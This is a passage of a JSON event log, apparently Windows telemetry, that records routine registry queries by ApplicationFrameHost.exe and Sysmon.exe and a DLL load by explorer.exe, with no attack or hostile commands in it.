"{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", - "registry_value": "ButtonPressedForegroundColor", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", - "registry_value": "ButtonBackgroundColorInactive", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573250110000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "CapabilityAccessManagerClient.dll", - "image_path": "C:\\Windows\\System32\\CapabilityAccessManagerClient.dll", - "pid": 4744, - "process_name": "explorer.exe", - "process_path": "C:\\Windows\\explorer.exe", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", - "registry_value": "ButtonForegroundColorInactive", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", - "registry_value": "ButtonBackgroundColor", - "timestamp": 131883573250110000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - 
"timestamp": 131883573250259984, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", - "registry_value": "ButtonForegroundColor", - "timestamp": 131883573250259984, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250259984, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - 
"registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", - "registry_value": "ButtonHoverBackgroundColor", - "timestamp": 131883573250259984, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250259984, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", - "registry_value": "ButtonHoverForegroundColor", - "timestamp": 131883573250259984, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250259984, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", - "registry_value": "ButtonPressedBackgroundColor", - "timestamp": 131883573250259984, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250259984, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", - "registry_value": "ButtonPressedForegroundColor", - "timestamp": 131883573250259984, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250259984, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", - "registry_value": 
